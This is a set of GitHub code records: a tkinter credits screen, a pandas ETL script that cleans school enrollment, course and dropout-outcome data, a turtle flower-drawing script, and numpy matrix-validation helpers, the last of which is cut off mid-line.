self.Google_img)\r\n\t\t\tself.Google_label.grid(row = 2, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Youtube_label = tk.Label(self.Creditos_Frame, image = self.Youtube_img)\r\n\t\t\tself.Youtube_label.grid(row = 3, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Vicente_label = tk.Label(self.Creditos_Frame, image = self.Vicente_img)\r\n\t\t\tself.Vicente_label.grid(row = 4, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\telse:\r\n\r\n\t\t\tself.Programador_Frame.grid_forget()\r\n\t\t\tself.Artista_Frame.grid_forget()\r\n\t\t\tself.Musica_Frame.grid_forget()\r\n\t\t\tself.Tester_Frame.grid_forget()\r\n\r\n\t\t\tself.Yo_label.grid_forget()\r\n\t\t\tself.Google_label.grid_forget()\r\n\t\t\tself.Youtube_label.grid_forget()\r\n\t\t\tself.Vicente_label.grid_forget()\r\n\r\n\t\t\tself.Anterior_button[\"state\"] = \"normal\"\r\n\t\t\tself.Siguiente_button[\"state\"] = \"disabled\"\r\n\r\n\t\t\tself.Apoyo_Frame.grid(row = 1, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Apoyo_info_label.pack(pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Profesor_Frame.grid(row = 2, column = 0, pady = 0, sticky = \"ew\")\r\n\t\t\tself.Profesor_info_label.pack(pady = Redondear(20, self.DR), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Pildoras_Frame.grid(row = 3, column = 0, pady = Redondear(20, self.DR), sticky = \"ew\")\r\n\t\t\tself.Pildoras_info_label.pack(pady = (Redondear(20, self.DR),Redondear(17, self.DR)), padx = Redondear(20, self.DR))\r\n\r\n\t\t\tself.Discord_label = tk.Label(self.Creditos_Frame, image = self.Discord_img)\r\n\t\t\tself.Discord_label.grid(row = 1, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Colegio_label = tk.Label(self.Creditos_Frame, image = self.Colegio_img)\r\n\t\t\tself.Colegio_label.grid(row = 2, column = 1, padx = (Redondear(20, self.DR),0))\r\n\r\n\t\t\tself.Pildoras_img_label = tk.Label(self.Creditos_Frame, image = self.Pildoras_img)\r\n\t\t\tself.Pildoras_img_label.grid(row = 3, column = 1, padx = (0,0))\r\n\r\n\tdef Destruir(self):\r\n\t\tself.Botones_Frame.destroy()\r\n\t\tself.Creditos_Frame.destroy()","repo_name":"Jaimewol12/Asalto_Blindado","sub_path":"Modulos/Creditos.py","file_name":"Creditos.py","file_ext":"py","file_size_in_byte":11177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72533466614","text":"#import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport numpy as np\nimport logging\nimport sys\nimport math\nimport enum\nfrom enum import Enum\nimport time\n\n\n#helper functions below\n#===================================\ndef tf_translate(val):\n if val == 'Y':\n translated = True\n elif val == 'N':\n translated = False\n else:\n translated = val\n return translated\n\ndef assign_tf_val(col):\n col_vals = col.values\n new_ar = [tf_translate(val) for val in col_vals]\n return new_ar\n\ndef first_char(col):\n col_vals = col.values\n return np.array([val[0][0] for val in col_vals])\n\ndef convert_ac_year(df, return_df = False):\n '''converts to spring year'''\n col_vals = df['academic_year'].values\n new_ar = [int(val.split('-')[1]) for val in col_vals]\n if return_df:\n df['academic_year'] = new_ar\n return df\n else:\n return new_ar\n \ndef attendance_function(df):\n \n df = convert_ac_year(df, return_df = True)\n df.academic_year = df.academic_year.astype(int)\n \n df['d'] = df['academic_year']-1\n df.d = df.d.astype('str')\n df['period_start'] = '9/1/'+ df.d\n #df.drop(['d'], axis = 1, inplace= True)\n\n df['d'] = df['academic_year']\n df.d = df.d.astype('str')\n df['period_end'] = '6/30/'+ df.d\n df.drop(['d'], axis = 1, inplace= True)\n\n df['possible'] = 180\n\n return df\n\ndef clean_date(date):\n d = date.split('/')\n yr = d[-1]\n yr = '20'+yr\n \n return d[0]+'/'+d[1]+'/'+yr\n\ndef clean_grade(df_detail, st_id, ac_year):\n gl = df_detail.grade_level.values\n condition = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year)\n condition = condition.values\n grade = gl[condition]\n if len(grade)>0:\n grade = grade.astype(int)[0]\n else:\n grade = -1\n return grade\n\ndef clean_advance_retain(df_detail, st_id, ac_year):\n gl = df_detail.grade_level.values\n ac_year = ac_year.astype(int)\n \n \n condition1 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year)\n condition2 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year+1)\n \n\n condition1 = condition1.values\n condition2 = condition2.values\n\n grade_lower = gl[condition1]\n grade_higher = gl[condition2]\n \n if len(grade_lower)>=1 and len(grade_higher)>=1:\n grade_lower = grade_lower.astype(int)[0]\n grade_higher = grade_higher.astype(int)[0]\n if grade_lower+1 == grade_higher:\n status = 'advance'\n elif grade_lower == grade_higher:\n status = 'retain'\n else:\n status = 'other'\n else:\n status = 'other'\n \n return status\n\ndef clean_exit(df_detail, st_id, ac_year):\n #change code of second entry when there is an exit\n condition1 = (df_detail.student_id.values == st_id) & (df_detail.academic_year == ac_year) & (df_detail.code == 'other')\n \n if len(df_detail[condition1])>0:\n return df_detail[condition1].index.values[0]\n else:\n return -1\n \n\n#data into correct format for database\n#===================================\n\n## Student schema\ndef clean_detail_for_student_schema(data_files, cleaned):\n \"\"\"Modified from function for VPS for Arlington data.\"\"\"\n \"\"\"I want to build the student data here. I think all of the information I need for this table is in the detail csv\"\"\"\n\n column_names = {\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any'\n\n }\n\n logging.info(\"ETL: Starting Arlington data cleaning for student schema...\")\n\n \n for raw_base in data_files:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n df.rename(columns=column_names, inplace=True)\n df = df.drop(['ETl_school_year', \n 'SCHOOL_ID', \n 'SCHOOL_LONG_NAME' ,\n 'GRADE_LEVEL_CD' , \n 'FRL' ,'LEP' ,\n 'Total_Absence' ,\n 'Total_Tardies', \n 'OSS_SUSP_NUMBERS', \n 'graduate_ind' ,\n 'diploma_completer_ind', \n 'First_Entry_Code', \n 'First_Entry_Code_Desc', 'Diploma_Type'], axis=1)\n \n #This gives multiple entries per student. It would be a good idea to \n #not replicate, so I'll first check to make sure it's consistent and then drop rows.\n df.fillna(-3, inplace = True)\n df.drop_duplicates(['student_id', \n 'cohort', \n 'race_ethnicity', \n 'gender', \n 'sped_any'\n ], inplace = True)\n\n df.student_id = df.student_id.astype(int)\n \n df.cohort = df.cohort.astype(int) + 3 # convert to graduating cohort\n \n \n stID_counts = df['student_id'].value_counts()\n duplicate_stIDs = stID_counts[stID_counts>1].index.values\n \n sped = assign_tf_val(df.sped_any)\n df.sped_any = sped\n\n \n for j in range(len(duplicate_stIDs)):\n duplicate_stID = duplicate_stIDs[j]\n \n vv = df[df['student_id']==duplicate_stID]['sped_any'].values \n if vv[0] or vv[1]:\n df.loc[df.student_id == duplicate_stIDs[j], 'sped_any'] = True\n \n df.drop_duplicates(['student_id', \n 'cohort', \n 'race_ethnicity', \n 'gender', \n 'sped_any'\n ], inplace = True)\n \n race = first_char(df.race_ethnicity)\n df.race_ethnicity = race\n df.race_ethnicity = df.race_ethnicity.astype(Enum)\n df.loc[df.race_ethnicity == 'O', 'race_ethnicity'] = 'X'\n gen = first_char(df.gender)\n df.gender = gen\n df.gender = df.gender.astype(Enum)\n\n df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n \n#Enrollment scehma\ndef clean_detail_for_enrollment_schema(data_files, cleaned):\n column_names = {\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'special_ed',\n 'ETl_school_year': 'academic_year',\n 'GRADE_LEVEL_CD' : 'grade_level',\n 'LEP': 'ell', #limited english proficiency -> English language learner\n \n\n }\n\n logging.info(\"ETL: Starting Arlington cleaning for enrollment schema\")\n \n base_dfs = []\n for raw_base in data_files:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n df.rename(columns=column_names, inplace=True)\n\n #TT, 77, and GD seem to indicate that someone has gone on after 12th grade without graduating\n #I'm going to enter all as 77 since it's an int\n df.grade_level[df.grade_level == 'TT'] = '77'\n df.grade_level[df.grade_level == 'GD'] = '77'\n \n df = df.drop(['SCHOOL_ID', \n 'SCHOOL_LONG_NAME' ,\n 'FRL' , #I'm not sure what this is\n 'Total_Absence' ,\n 'Total_Tardies', \n 'OSS_SUSP_NUMBERS', \n 'graduate_ind' ,\n 'diploma_completer_ind', \n 'First_Entry_Code', \n 'First_Entry_Code_Desc', \n 'Diploma_Type', \n 'race_ethnicity',\n 'cohort',\n 'gender'\n \n ], axis=1)\n \n #academic year should be an int. We go with the spring year\n years = convert_ac_year(df)\n df['academic_year'] = years\n \n #convert data types for columns we have\n df.student_id = df.student_id.astype(int)\n df.grade_level= df.grade_level.astype(int)\n df.academic_year = df.academic_year.astype(int)\n ell = assign_tf_val(df.ell)\n df.ell = ell\n \n sped = assign_tf_val(df.special_ed)\n df.special_ed = sped\n \n \n df.d = df.academic_year -1\n df.d = df.d.astype('str')\n df['date'] = '9/1/'+ df.d\n \n pd.to_datetime(df.date, format='%m/%d/%Y', errors='coerce')\n \n df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n\n#Course, course enrollment, and school schema \ndef clean_for_course_schema(course_data, detail_dat, cleaned):\n #I think I have to infer this from the marks data\n #I should get the student ID and academic year\n\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n\n #first create map for school name\n for raw_base in detail_dat:\n\n df_detail = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n \n \n df_detail.rename(columns=column_names, inplace=True)\n df_detail = df_detail.drop([\n #'GRADE_LEVEL_CD',\n 'gender',\n 'cohort',\n 'race_ethnicity',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'Total_Absence',\n 'Total_Tardies',\n 'OSS_SUSP_NUMBERS',\n 'graduate_ind',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n \n ], axis=1)\n \n #I'm going to make the school table.\n #There isn't enough data to get the years for each school from the data. \n #extra research needed\n \n \n df_school = df_detail.drop_duplicates([\n 'school_name'\n ], inplace = False)\n df_school = df_school.drop(['student_id',\n 'academic_year',\n 'GRADE_LEVEL_CD'],\n axis = 1\n )\n \n column_names_school = {\n 'school_name':'name'\n }\n df_school.rename(columns=column_names_school, inplace=True)\n\n df_school_unknown = pd.DataFrame([[-1, 'unknown_1'], [-2, 'ND'], [-3,'APT']], columns =['school_id', 'name'])\n df_school = df_school.append(df_school_unknown)\n \n df_school.to_csv(cleaned[2], header=True, index=False, date_format='%Y%m%d')\n \n #this was mapped manually\n #we don't have course data for most of the schools. \n #I'm going to map the numbers in this table and then map the names to the names from the other table\n school_to_id = {'H-B Woodlawn':'39',\n 'CC':'70',\n 'Williamsburg':'45',\n 'Washington Lee':'44',\n 'Yorktown':'49',\n 'Wakefield':'43',\n 'Arlington Mill':'26',\n 'Jefferson':'23',\n 'Swanson':'40',\n 'Langston':'25',\n 'Kenmore':'24',\n 'Gunston':'15',\n 'TJHSST':'96',\n 'NaN':'-1',\n 'ND':'-2',\n 'APT':'-3'}\n \n for raw_base in course_data:\n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n df.rename(columns=column_names, inplace=True)\n df.student_id = df.student_id.astype(int)\n \n logging.info(\"ETL: Cleaning base data file raw_base %s\"%raw_base)\n logging.info(\"Cleaning data for course schema...\")\n df.rename(columns=column_names, inplace=True)\n\n \n column_names = {'desc':'name', 'code':'course_code'}\n\n df['school_id'] = df['school_name'].map(school_to_id)\n #no foreign key constraint on school_id so just leave it in there for now.\n df.school_id.fillna(-1, inplace = True)\n \n\n df.rename(columns=column_names, inplace=True)\n years = convert_ac_year(df)\n \n years = np.array(years)\n df['d'] = years\n df.d = df.d.astype(int)\n \n #there is no info about dates besides academic year, so i'll just assume all course data is available on the last day of\n #the academic year.\n df.d = years\n df['academic_year'] = df.d.astype(int)\n df.d = df.d.astype('str')\n df['date'] = '6/30/'+ df.d\n df.drop(['d'], axis = 1, inplace= True)\n df_course_enrollment = df.drop(['name', 'school_name'], axis = 1)\n\n df_course_enrollment.drop_duplicates(['student_id',\n 'academic_year',\n 'course_code',\n 'mark'], inplace = True)\n\n #Sometimes people will withdraw and re-enter the same year.\n #I will make the 'date' for the W the fall semester.\n withdrawn = df_course_enrollment[df_course_enrollment['mark']=='W']\n\n #below should be rewritten \n start_time = time.time()\n for jk in range(len(withdrawn)):\n vv = withdrawn.iloc[jk]\n st_id = vv.student_id\n c_id = vv.course_code\n yr = vv.academic_year\n b = (df_course_enrollment['student_id'].values == st_id) & (df_course_enrollment['course_code'].values == c_id)\n\n vals = df_course_enrollment[b]\n if len(vals)>1:\n vals2 = vals[vals['mark']!='W']\n vw = vals[vals['mark']=='W']\n if yr in vals.academic_year.values:\n indw = vw.index.values[0]\n ind = vals[vals['academic_year']==yr].index.values[0]\n new_year = df_course_enrollment.academic_year.loc[ind]-1\n df_course_enrollment.date.loc[indw] = '12/31/'+ new_year.astype('str')\n \n end_time = time.time()\n \n #it looks like some people take the same course more than once in a year without withdrawing.\n #for now I'm going to drop this info\n \n df_course_enrollment.drop_duplicates(['student_id',\n 'academic_year',\n 'course_code',\n 'date'], inplace = True)\n\n df_course_enrollment.to_csv(cleaned[1], header=True, index=False, date_format='%Y%m%d')\n \n #now I will reduce this course enrollment data into course data\n df_course_enrollment = df_course_enrollment.drop(['student_id', \n 'academic_year', \n 'mark' ,\n 'date'], axis=1)\n \n df_course_enrollment.drop_duplicates(['school_id',\n 'course_code'], inplace=True)\n #column_names = {'code':'course_code'}\n #df_course_enrollment.rename(columns=column_names, inplace=True)\n df_course_enrollment['code'] = df_course_enrollment['course_code']\n df_course_enrollment.drop(['course_code'],axis = 1, inplace=True)\n \n df_course_enrollment.to_csv(cleaned[0], header=True, index=False, date_format='%Y%m%d')\n \ndef clean_for_attendance(detail_dat, cleaned):\n #for possible I will just be using 180 for each academic year\n #need: student_id, school_id, period_start, and period_end\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n 'Total_Tardies':'tardy',\n 'Total_Absence':'absence_excused'\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n \n\n #first create map for school name\n for raw_base in detail_dat:\n \n\n df = pd.read_csv(raw_base, sep=',', header=0, dtype=object)\n\n df.rename(columns=column_names, inplace=True)\n df = df.drop([\n 'GRADE_LEVEL_CD',\n 'gender',\n 'cohort',\n 'race_ethnicity',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'graduate_ind',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n 'OSS_SUSP_NUMBERS',\n 'school_name'\n \n ], axis=1)\n \n \n df_attendance = attendance_function(df)\n df_attendance.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n \ndef simplified_outcome_detail_code(outcome_dat, detail_dat):\n #for possible I will just be using 180 for each academic year\n #need: student_id, school_id, period_start, and period_end\n column_names = {\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC':'name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'STUDENT_ID': 'student_id',\n 'FIRST_TIME_9TH_GRADER_COHORT': 'cohort', #this seems to be the year that they finished 9th grade\n 'BIRTH_DT': 'date_of_birth',\n 'GENDER_DESC': 'gender',\n 'ALT_RACE_DESC': 'race_ethnicity',\n 'SPED': 'sped_any',\n 'ETl_school_year':'academic_year',\n 'ETL_SCHOOL_YEAR':'academic_year',\n 'SCHOOL_ID':'school_id',\n 'SCHOOL_LONG_NAME': 'school_name',\n 'SCHOOL_SHT_NAME':'school_name',\n 'COURSE_CD':'code',\n 'COURSE_LONG_DESC' : 'desc',\n 'Mark': 'mark',\n 'Total_Tardies':'tardy',\n 'Total_Absence':'absence_excused',\n 'GRADE_LEVEL_CD':'grade_level'\n\n #need school ID. will have to write something to look this up --> Can get from detail dat\n\n }\n\n df_detail = pd.read_csv(detail_dat, sep=',', header=0, dtype=object)\n df_outcome = pd.read_csv(outcome_dat, sep=',', header =0, dtype = object)\n\n \n df_outcome.rename(columns=column_names, inplace=True)\n df_detail.rename(columns = column_names, inplace=True)\n \n \n #we have more outcome data than we have student ID data. \n #After some investigation I find that some students must have more than one outcome\n \n df_outcome = convert_ac_year(df_outcome, return_df = True)\n df_detail = convert_ac_year(df_detail, return_df = True)\n \n df_outcome = df_outcome.drop(['Year_Type',\n 'school_name',\n #'grade_level', #this is not accurate in the outcome file. It is always listed as 12 even though it isn't\n 'race_ethnicity',\n 'gender',\n 'Entry_Date',\n 'ENTRY_REASON_CD',\n \n ],\n axis = 1)\n \n df_outcome.grade_level = -1\n df_detail = df_detail.drop(['school_name',\n 'race_ethnicity',\n 'gender',\n 'FRL',\n 'LEP',\n 'sped_any',\n 'absence_excused',\n 'tardy',\n 'cohort',\n 'OSS_SUSP_NUMBERS',\n 'First_Entry_Code_Desc',\n 'Diploma_Type',\n 'diploma_completer_ind',\n 'First_Entry_Code',\n \n ],\n axis = 1)\n \n\n df_detail['code'] = 'end_of_year'#'end_of_year'\n df_detail['code'][df_detail['graduate_ind']=='1'] = 'graduate'\n df_detail = df_detail.drop(['graduate_ind'], axis = 1)\n \n \n df_detail = df_detail.sort(['student_id', 'grade_level'])\n df_detail['at_default_school'] = True #I will set this to True for the detail df\n df_outcome = df_outcome.sort(['student_id'])\n df_outcome['at_default_school'] = True #Just set this to false for now and will check later\n df_code = df_outcome.copy()\n df_outcome = df_outcome.drop(['EXIT_CODE_LONG_DESCRIPTION'], axis=1)\n df_code = df_code.drop(['academic_year',\n \n 'student_id',\n 'school_id',\n 'Exit_Date',\n ], axis =1)\n \n df_code = df_code.drop_duplicates(['EXIT_REASON_CD'])\n\n\n return df_detail, df_outcome\n\ndef clean_for_outcome(outcome_dat, detail_dat, cleaned): \n APScode_to_standard = {'W503':'exit',\n 'W310':'exit',\n 'W970':'exit',\n 'W402':'exit',\n 'W313':'exit',\n 'W870':'exit',\n 'W321':'exit',\n 'W217':'exit',\n 'W306':'exit', \n 'W307':'exit',\n 'W305':'exit',\n 'W304':'exit',\n 'W312':'exit',\n 'W960':'exit',\n 'W4TJ':'exit',\n 'W880':'dropout',\n 'W201':'transfer_internal',\n 'W503':'exit',\n 'W016':'transfer_internal',\n 'W115':'transfer_internal',\n 'W99': 'end_of_year_outcome', \n 'W411':'other',\n 'W730':'graduate',\n 'W731':'graduate'}\n\n df_detail, df_outcome = simplified_outcome_detail_code(outcome_dat, detail_dat)\n \n #I'm going to drop anything with 'end_of_year_outcome' because I think it doesn't give us any information\n df_outcome = df_outcome[df_outcome.EXIT_REASON_CD != 'W99']\n df_outcome['code'] = df_outcome['EXIT_REASON_CD'].map(APScode_to_standard)\n df_outcome.drop(['EXIT_REASON_CD'], axis = 1, inplace = True)\n df_detail['d'] = df_detail.academic_year.astype(int)\n df_detail['Exit_Date'] = '6/30/'+df_detail.d.astype(str)\n df_detail.drop(['d'], axis = 1, inplace = True)\n df_detail.grade_level[df_detail.grade_level == 'TT'] = '77'\n df_detail.grade_level[df_detail.grade_level == 'GD'] = '77'\n \n dates = df_outcome['Exit_Date'].apply(clean_date)\n df_outcome['Exit_Date']=dates\n df_outcome['date'] = df_outcome.Exit_Date\n df_detail['date'] = df_detail.Exit_Date\n \n #df = pd.concat([df_detail, df_outcome])\n df = pd.concat([df_outcome, df_detail])\n \n #I think TT and GD are continuing education codes\n #I have put grade level from outcome table as -1\n \n df = df.sort(['student_id', 'date', 'grade_level']) \n df = df.drop_duplicates(['academic_year', 'student_id', 'code', 'school_id', 'grade_level'])\n \n neg1 = (df['grade_level']=='-1').values\n \n st_ids = df.student_id.values[neg1]\n ac_yrs = df.academic_year.values[neg1]\n new_grades = np.array([clean_grade(df_detail, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))])\n \n df.grade_level[neg1] = new_grades\n df.grade_level = df.grade_level.astype(int)\n df.student_id = df.student_id.astype(int)\n df.academic_year = df.academic_year.astype(int)\n df_detail.student_id = df_detail.student_id.astype(int)\n df_detail.academic_year = df_detail.academic_year.astype(int)\n df_detail.grade_level = df_detail.grade_level.astype(int)\n \n df = df.drop_duplicates(['academic_year', 'student_id', 'code', 'school_id', 'grade_level'])\n \n g1 = (df['code']=='end_of_year').values\n st_ids = df.student_id.values[g1]\n ac_yrs = df.academic_year.values[g1]\n new_codes = np.array([clean_advance_retain(df_detail, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))])\n df.code[g1] = new_codes\n\n df = df[df['grade_level']!=-1]\n \n g1 = (df.code == 'dropout') | (df.code == 'exit') | (df.code == 'graduate') \n st_ids = df[g1].student_id.values\n ac_yrs = df[g1].academic_year.values\n drop_inds = list(set([clean_exit(df, st_ids[i], ac_yrs[i]) for i in range(len(st_ids))]))\n drop_inds = np.array(drop_inds)\n drop_inds = drop_inds[drop_inds>0]\n \n df.code.iloc[drop_inds]='drop'\n df = df[df.code != 'drop']\n \n #let's make sure all the columns are the right datatype\n df.student_id = df.student_id.astype(int)\n df.school_id = df.school_id.astype(int)\n df.academic_year = df.academic_year.astype(int)\n df.grade_level = df.grade_level.astype(int)\n pd.to_datetime(df.date, format='%m/%d/%Y', errors='coerce')\n df.code= df.code.astype(Enum)\n\n df['date'] = df['Exit_Date']\n df.drop(['Exit_Date'], axis = 1, inplace=True)\n \n \n df.to_csv(cleaned, header=True, index=False, date_format='%Y%m%d')\n","repo_name":"lisamnash/predicting_dropouts","sub_path":"etl/sys1/clean.py","file_name":"clean.py","file_ext":"py","file_size_in_byte":27006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29369183675","text":"# https://seongjuhong.com/2019-06-25am-how-to-draw-random-flower-with-python-turtle/\n\nfrom random import randrange\nfrom turtle import Turtle, Screen\n\nMAX_ANGLE = 30\nMAX_DISTANCE = 250\n\ndef jaggedLine (turtle, pieceLength):\n randomColor(turtle)\n\n while turtle.distance(0,0) < MAX_DISTANCE:\n angle = randrange(-MAX_ANGLE, MAX_ANGLE +1)\n turtle.right(angle)\n turtle.forward(pieceLength)\n\ndef jumToCenter(turtle):\n turtle.penup()\n turtle.home()\n turtle.pendown()\n\ndef randomColor(turtle):\n r = randrange(255)\n g = randrange(255)\n b = randrange(255)\n\n turtle.pencolor(r, g, b)\n\ndef main():\n s = Screen()\n s.colormode(255)\n t = Turtle()\n t.speed('fastest') # because I have no patience\n\n for angle in range (0, 360, 2):\n jumToCenter(t)\n t.setheading(angle)\n jaggedLine(t, 30)\n\n t.hideturtle()\n\n s.mainloop()\n\nif __name__ == \"__main__\":\n main()","repo_name":"mervy/playing-with-python","sub_path":"playingWithTurtle/randomFlower.py","file_name":"randomFlower.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21221477644","text":"import numpy as np\n\nfrom implicit_config import TOLERANCE\nfrom implicit_config import VERBOSE\n\n\ndef make_inverse(m):\n assert not issubclass(m.dtype.type, np.integer)\n assert m.shape == (4, 4), \"Matrix must be 4x4\"\n invm = np.linalg.inv(m)\n assert np.allclose(np.dot(invm, m), np.eye(4), atol=TOLERANCE), \"Matrix inversion failed: Matrix is singular or bad conditioned\"\n assert np.allclose(np.dot(m, invm), np.eye(4), atol=TOLERANCE), \"Matrix inversion failed: Matrix is singular or bad conditioned\"\n error = np.sum(np.abs(np.dot(invm, m) - np.eye(4)))\n if VERBOSE:\n print(\"Error of the inverse matrix: %2.20f\" % error)\n v0001 = np.reshape(np.array((0, 0, 0, 1)), (4))\n assert np.allclose(invm[3, :], v0001, atol=TOLERANCE), \"Last row of the inverse matrix should be 0,0,0,1 \"\n return invm\n\n\ndef check_matrix4(m):\n assert not issubclass(m.dtype.type, np.integer)\n assert m.shape == (4, 4), \"Matrix must be 4x4\"\n assert np.allclose(m[3, :], np.array((0, 0, 0, 1)), atol=0.00000000001), \"Last row of any Matrix4 must be 0,0,0,1\"\n assert not np.any( np.isnan(m.ravel()) )\n assert not np.any( np.isinf(m.ravel()) )\n\ndef check_matrix4_vectorized(m):\n assert not issubclass(m.dtype.type, np.integer)\n assert m.shape[1, :] == (4, 4), \"Matrix must be Nx4x4\"\n for i in range(m.shape[0]):\n assert np.allclose(m[i, 3, :], np.array((0, 0, 0, 1)), atol=0.00000000001), \"Last row of any Matrix4 must be 0,0,0,1\"\n assert not np.any( np.isnan(m.ravel()) )\n assert not np.any( np.isinf(m.ravel()) )\n\n\ndef check_matrix3_vectorized(h):\n #print(h.ndim)\n #print(h.ndim == 3)\n #print(h.shape)\n #print(h.shape[1:])\n #print(h.shape[1:] == (3,3) )\n assert h.ndim == 3, \"not 3d\"\n #assert(h.shape[1] == 3)\n #assert(h.shape[2] == 3)\n assert h.shape[1:] == (3, 3), \"not :x3x3\"\n assert not np.any( np.isnan(h.ravel()) )\n assert not np.any( np.isinf(h.ravel()) )\n\n\ndef check_vector4(p):\n assert not issubclass(p.dtype.type, np.integer)\n assert p.shape == (4,), \"Vector must be a numpy array of (4) elements\"\n assert p[3] == 1.0, \"4th element of every Vector must be 1.0\"\n assert not np.any( np.isnan(p.ravel()) )\n assert not np.any( np.isinf(p.ravel()) )\n\n\ndef check_vector4_vectorized(pa):\n #assert not issubclass(np.dtype('int8').type, np.integer)\n assert not issubclass(pa.dtype.type, np.integer)\n assert pa.ndim == 2\n assert pa.shape[1:] == (4,), \"Vector must be a numpy array of (Nx4) elements\"\n e = np.sum(np.abs(pa[:, 3]-1))\n if e > 0.0:\n print(\"EERROR:\", e)\n assert np.allclose(pa[:, 3], 1, 0.00000000000001), \"4th element of every Vector must be 1.0\"\n assert not np.any( np.isnan(pa.ravel()) )\n assert not np.any( np.isinf(pa.ravel()) )\n\ndef check_scalar_vectorized(va, N=None):\n #assert va.ndim == 2 #dont force 2 dim. can accesp .shape==(100,)\n assert not issubclass(va.dtype.type, np.integer)\n n = va.shape[0]\n if va.ndim == 2:\n assert va.shape[1] == 1\n assert va.shape == (n, 1), \"values must be a numpy array of (N,) or (Nx1) elements\"\n if not N is None:\n assert va.shape[0] == N\n assert not np.any( np.isnan(va.ravel()) )\n assert not np.any( np.isinf(va.ravel()) )\n\ndef make_vector4_numpy(v):\n assert issubclass(type(v), np.ndarray)\n assert v.size == 3 or v.size == 4\n\n assert not np.any( np.isnan(v.ravel()) )\n assert not np.any( np.isinf(v.ravel()) )\n\n v = v.ravel()\n return np.array((float(v[0]), float(v[1]), float(v[2]), 1.0))\n\n\ndef make_vector4(x, y, z):\n xyz = np.array([x,y,z])\n assert not np.any( np.isnan(xyz) )\n assert not np.any( np.isinf(xyz) )\n\n if issubclass(type(x), np.ndarray):\n return np.array((float(x[0]), float(y[1]), float(z[1]), 1.0))\n\n return np.array((float(x), float(y), float(z), 1.0))\n\ndef make_vector4_vectorized(x, y, z):\n return make_vector4(x, y, z).reshape((1,4))\n\n\ndef almost_equal4(a, b, TOLERANCE):\n assert not np.any( np.isnan(a.ravel()) )\n assert not np.any( np.isinf(b.ravel()) )\n assert not issubclass(a.dtype.type, np.integer)\n check_vector4(a)\n check_vector4(b)\n return np.sum(np.abs(a - b)) < TOLERANCE\n\n\ndef almost_equal1(a, b, TOLERANCE):\n \"\"\" Scalar version \"\"\"\n assert not issubclass(a.dtype.type, np.integer)\n np.isscalar(a)\n np.isscalar(b)\n return np.sum(np.abs(a - 